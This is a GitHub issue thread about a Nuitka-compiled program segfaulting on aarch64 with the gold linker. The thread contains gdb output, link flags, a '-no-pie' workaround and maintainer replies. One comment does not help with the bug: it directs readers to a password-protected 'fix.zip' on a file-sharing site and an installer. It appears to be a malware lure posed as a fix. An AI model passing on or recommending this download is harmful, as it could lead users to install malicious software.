### ISSUE TITLE
Segment fault while using gold linker on aarch64, but no-pie works.

### ISSUE THREAD

**Issue by crouchggj** [Nuitka/Nuitka#3096]
Hi,
  I notice that the executable crashes due to a segment fault when it's used with Nuitka (the latest release version: 2.4.8) . Such as:
```
test@111:~/test_nuitka$ python3 -m nuitka --debug main.py
Nuitka-Options: Used command line options: --debug main.py
Nuitka-Options:WARNING: You did not specify to follow or include anything but main program.
Nuitka-Options:WARNING: Check options and make sure that is intended.
Nuitka: Starting Python compilation with Nuitka '2.4.8' on Python '3.8' commercial grade 'not
Nuitka: installed'.
Nuitka: Completed Python level compilation and optimization.
Nuitka: Generating source code for C backend compiler.
Nuitka: Running data composer tool for optimal constant value handling.
Nuitka: Running C compilation via Scons.
Nuitka-Scons: Backend C compiler: gcc (gcc 9).
Nuitka-Scons: Backend linking program with 6 files (no progress information available for this
Nuitka-Scons: stage).
Nuitka-Scons:WARNING: You are not using ccache, re-compilation of identical code will be slower
Nuitka-Scons:WARNING: than necessary. Use your OS package manager to install it.
Nuitka: Keeping build directory 'main.build'.
Nuitka: Successfully created 'main.bin'.
test@111:~/test_nuitka$ ./main.bin 
Nuitka: A segmentation fault has occurred. This is highly unusual and can
have multiple reasons. Please check https://nuitka.net/info/segfault.html
for solutions.
Segmentation fault (core dumped)
```

 main.py is a simple example, just like:
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-

def main():
    print("Hello, World!")

if __name__ == "__main__":
    main()
```

  **environment**
-  OS: ubuntu20.04 LTS aarch64
-  GCC: 9.3.0
-  LD: gold (Binutils for Ubuntu 2.34) 1.16
-  Python: 3.8.2

 **workaround**
  I use gdb to debug this issue and find it's caused by illegal access memory address.
```
Core was generated by `./main.bin'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00000055602c8528 in unpackValueUint32 (data=0x55607983d0 <constant_bin>)
    at /usr/include/aarch64-linux-gnu/bits/string_fortified.h:34
34	  return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest));
(gdb) bt
#0  0x00000055602c8528 in unpackValueUint32 (data=0x55607983d0 <constant_bin>)
    at /usr/include/aarch64-linux-gnu/bits/string_fortified.h:34
#1  0x00000055602d107c in loadConstantsBlob (tstate=0x556080df30, 
    output=0x55607df628 <global_constants>, name=0x556053a0d8 "")
    at /home/linaro/.local/lib/python3.8/site-packages/nuitka/build/static_src/HelpersConstantsBlob.c:1254
#2  0x00000055603055d8 in _createGlobalConstants (tstate=0x556080df30) at __constants.c:66
#3  0x0000005560305a28 in createGlobalConstants (tstate=0x556080df30) at __constants.c:266
#4  0x0000005560307008 in main (argc=1, argv=0x556080df30) at static_src/MainProgram.c:1411
(gdb) up
#1  0x00000055602d107c in loadConstantsBlob (tstate=0x556080df30, 
    output=0x55607df628 <global_constants>, name=0x556053a0d8 "")
    at /home/linaro/.local/lib/python3.8/site-packages/nuitka/build/static_src/HelpersConstantsBlob.c:1254
1254	        uint32_t hash = unpackValueUint32(&constant_bin); <==== illegal  memory access
(gdb) p constant_bin 
$1 = (const unsigned char *) 0x550010 <error: Cannot access memory at address 0x550010>
(gdb) 
 0x550010 looks like a absolutely address.

```
 Then I check compile procedure, and maybe variable constant_bin is generated by linker `-Wl,binary -Wl,./__constants.bin`, such as:
```
gcc -o /home/linaro/test_nuitka/main.bin -flto=8 -fuse-linker-plugin -fpartial-inlining -freorder-functions -Og -g -z noexecstack -Xlinker -export-dynamic -rdynamic -Wl,-R,'/usr/lib' -Wl,--disable-new-dtags -Wl,-b -Wl,binary -Wl,./__constants.bin -Wl,-b -Wl,elf64-littleaarch64 -Wl,-defsym -Wl,constant_bin_data=_binary_____constants_bin_start @"./@link_input.txt" -L/usr/lib -ldl -lm /usr/lib/python3.8/config-3.8-aarch64-linux-gnu/libpython3.8-pic.a -lz -lm -lutil -lpthread -lexpat
```
I'm not familiar with ld or gold linker, but when I use ld as default linker, it works and constant_bin's address will be base_address + absolutely address, and I think it's something about code position. So I modify `/usr/local/lib/python3.8/dist-packages/nuitka/build/SconsCompilerSettings.py`
```
173     if env.gcc_mode and lto_mode:
174         env.Append(CCFLAGS=["-flto"])
175 
176         if env.clang_mode:
177             env.Append(LINKFLAGS=["-flto"])
178         else:
179             env.Append(CCFLAGS=["-fuse-linker-plugin", "-fno-fat-lto-objects"])
180             env.Append(LINKFLAGS=["-fuse-linker-plugin"])
181             env.Append(LINKFLAGS=["-no-pie"])   <----- add
182             
```
After compiled with `-no-pie`, it works as well (at least not crash). 
I'm not sure it's available or I miss something?
Thanks!

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kayhayen** [comment]
This would have to be a gold upstream bug. The LTO of it is probably one which mishandles the constants blob, which has been seen before. For now I would say, that old gold is probably unsupported. How do I get things to use gold on my Linux system anyway?

**Comment by kayhayen** [comment]
Closing for lack of feedback
